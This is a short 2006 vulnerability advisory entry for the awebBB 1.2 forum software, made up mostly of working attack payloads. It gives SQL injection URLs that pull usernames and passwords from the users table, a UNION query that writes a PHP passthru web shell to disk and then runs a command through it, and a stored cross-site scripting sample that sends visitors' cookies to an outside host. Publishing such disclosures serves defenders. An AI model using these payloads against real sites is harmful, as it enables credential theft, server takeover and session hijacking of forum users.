awebBB 1.2 Vuln

2006-04-10T00:00:00
ID SECURITYVULNS:DOC:12115
Type securityvulns
Reporter Securityvulns
Modified 2006-04-10T00:00:00

Description

  1. SQL Injection

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,passwor d,0,0,0%20from%20users/*

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER() ,0,0,0/*

If magic_quotes_gpc is off:

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,'<?%20passthru($_G ET[cmd])%20?>',0,0,0,0,0%20from%20users%20INTO%20OUTFILE%20'/PATH/shell.php' /*

AND

/shell.php?cmd=ls

  1. Cross Site Scripting

/ndis.php

Insufficient check fpost.

<div class="blue-box"><div class="breaker"><a id="id"></a><b>Re:Re:Re:test</b> by <a href="dpost.php?p=test">test</a></div><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td height="80" width="80" rowspan="2"><img src="images/af.jpg" border="0" align="left" width="80" height="80"></td><td valign="top"><div class="breaker"><script>document.write("<img src='http://bug/xss.php?c="+ document.cookie +"'style=visibility:hidden;'>");</script></div></td></tr><tr><td valign="bottom"><div align="right"><i>Love Life</i><br>15:24:04 - 2006-04-08</div></td></tr></table><div class="breaker"></div><div id="masterdiv12"><div class="menutitle" onclick="SwitchPlanet('sub12')">&nbsp~ <a href="#12">Reply</a></div><span class="submenu12" id="sub12">

http://www.securitylab.ru/forum/read.php?FID=16&TID=23108


Email: kevrter@netw.ru ICQ: 294308